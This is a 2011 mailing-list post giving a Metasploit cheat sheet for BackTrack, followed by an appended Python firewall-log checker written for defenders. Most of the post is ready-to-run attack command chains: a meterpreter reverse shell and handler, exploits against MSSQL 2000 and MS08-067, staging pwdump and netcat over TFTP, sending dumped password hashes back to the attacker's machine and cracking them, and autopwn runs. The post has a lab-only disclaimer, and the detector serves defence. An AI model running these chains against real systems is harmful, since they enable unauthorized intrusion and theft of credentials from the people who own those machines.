[Plug-security] Basic Metasploit CHEAT Sheet

Lisa Kachold lisakachold at obnosis.com
Tue Jan 18 11:30:29 MST 2011


Okay, you guys, here are a couple of HowTos for basic Metasploit from
Backtrack4R1:

0) Quick Windows MultiHandler Reverse Shell

startx
/etc/init.d/./wicd start
{check your wireless or wired connection is working}
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.666 LPORT=4444 > /root/payload.exe
optimize /root/putty.exe (for Windows target)
msfconsole
msf> use exploit/multi/handler
msf> set PAYLOAD windows/meterpreter/reverse_tcp
msf> show options
msf> set RHOST (local host ip)
msf> shell go
msfconsole > migrate <process #>
example  msfconsole > migrate 256
msf> show exploits
msf> use name (from show exploits)
msf> set PAYLOAD
msf> set RHOST
msf> set LHOST

1) Nmap Mssql 2000
nmap -sT -O 10.10.10.254
nmap -sV 10.10.10.254
msfconsole
show exploits
cut and paste with your mouse highlight
use mssql2000_resolution
set PAYLOAD win32_bind_meterpreter
show options
set RHOST (target) 10.10.10.254
exploit
help
execute -n Process
execute -f file
execute -f cmd -c
interact 1
ipconfig
see Menu---->System-->MISC--->TFTPD Server Start
On your Backtrack Linux shell:
cd /pentest/windows-binaries/tools
ls
cp PwDmp4.dll /tmp/PwDmp4.exe
cd /pentest/password/dictionaries
ls
cp wordlist.txt.gz /tmp/wordlist.txt
tftp -i 10.10.10.254 get PwDump4.dll (or exe)
tftp -i 10.10.10.254 get nc.exe
<go back to windows shell>
pwDmp4.exe
pwDmp4.exe \l \o:pwdmp4.txt
tftp 10.10.10.666 (our ip) put pwdmp4.txt
<back to linux BT environment shell>
cat pwdmp4.txt
john pwdmp4.txt
john -show pwdmp4.txt
john -w:wordlist.txt -f:NT pwdmp4.txt
<back to Windows>
nc -L -p 10.10.10.254
<back to BT linux shell>
telnet victim - login as Administrator with password

2) Quick VNC using Autopwn
msfconsole
db_create foo
db_nmap <targetip or> 10.10.10.254
db_autopwn -h
db_autopwn -p -e
sessions -i 1
sysinfo
run vnc_oneport

3) Quick SMB (use another exploit if you like) & VNC Reverse Shell
msfconsole
use windows/smb/ms08_067_netapi
show options
set PAYLOAD windows/vncinject/reverse_tcp
show options
set RHOST 10.10.10.254
show options
set LHOST 10.10.10.666
exploit
<spawns a shell on reverse machine>

4) Example using Nessus Plugins and db_autopwn
<shell>
apt-get install nessusd nessus
nessusd (takes about 10 minutes to start)
cd /pentest/exploits/framework3
svn update
./msfconsole
<another shell>
./nessus
 Start a scan and Generate a Report
msf> help
msf> db_create /root/database/foobar.db
msf> db_import
      Cross reference from the report showing the exploit port open and probable, as reported from Nessus
Save output of the Nessus report to /root/nessus.nbe
msf> db_import_nessus_nbe /root/nessus.nbe
msf> db_autopwn -p -e
Voilà!

DISCLAIMER: The use of Backtrack4R2 is advocated in pentest laboratories
only and for fully qualified professionals after written Corporate
approval. We do not advocate "cracking" and prefer the definition of
hacker in its original term, meaning those who reverse engineer and
creatively evaluate to learn. We do not advocate "learning to hack";
instead hacking to learn.

Please come to our next PLUG Linux Security Team HackFest at Gangplankhq.com
January 29, 2011, Noon until 3PM.

-- 

(503) 754-4452
(623) 688-3392

 http://www.obnosis.com
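Editor's addition for the defensive side, not part of Lisa's post or of Metasploit: a small Python check that walks a constructed firewall log and flags the network artifacts the chains above leave behind, namely an internal host connecting out to TCP/4444 (the LPORT used for the reverse_tcp payloads), TFTP on UDP/69 (the tool-staging step), and probes of the SQL Server resolution service on UDP/1434 that the mssql2000 exploit targets. The log line format, hostnames and the 10.10.10.0/24 internal range are assumptions for the example.

```python
import re

# Constructed sample log (assumed format: time action proto src:port -> dst:port).
SAMPLE_LOG = """\
2011-01-18T11:30:01 ALLOW UDP 10.10.10.7:51203 -> 10.10.10.254:1434
2011-01-18T11:30:02 ALLOW TCP 10.10.10.254:49160 -> 10.10.10.66:4444
2011-01-18T11:30:03 ALLOW UDP 10.10.10.254:1027 -> 10.10.10.66:69
2011-01-18T11:30:04 ALLOW TCP 10.10.10.20:52001 -> 10.10.10.254:443
2011-01-18T11:30:05 ALLOW TCP 10.10.10.20:52002 -> 93.184.216.34:80
"""

LINE_RE = re.compile(r"^(\S+) (\w+) (TCP|UDP) (\S+):(\d+) -> (\S+):(\d+)$")

# Internal address prefix for this constructed example; adjust for a real network.
INTERNAL_PREFIX = "10.10.10."

# (protocol, destination port) -> why a defender cares.
RULES = {
    ("TCP", 4444): "outbound connection to the default Metasploit reverse_tcp port",
    ("UDP", 69): "TFTP transfer from an internal host (tool staging)",
    ("UDP", 1434): "probe of the SQL Server resolution service (UDP/1434)",
}


def parse(line):
    """Parse one log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, _action, proto, src, sport, dst, dport = m.groups()
    return {"ts": ts, "proto": proto, "src": src, "sport": int(sport),
            "dst": dst, "dport": int(dport)}


def flag_events(log_text):
    """Return (timestamp, src, dst, reason) for every internal-sourced line that hits a rule."""
    hits = []
    for line in log_text.splitlines():
        ev = parse(line)
        if ev is None:
            continue
        reason = RULES.get((ev["proto"], ev["dport"]))
        if reason and ev["src"].startswith(INTERNAL_PREFIX):
            hits.append((ev["ts"], ev["src"], ev["dst"], reason))
    return hits


if __name__ == "__main__":
    for hit in flag_events(SAMPLE_LOG):
        print(*hit)
```

A single TCP/4444 flow is a weak signal on its own; correlating it with a TFTP transfer from the same server inside a few seconds, as the sample does, is what makes it worth paging someone over.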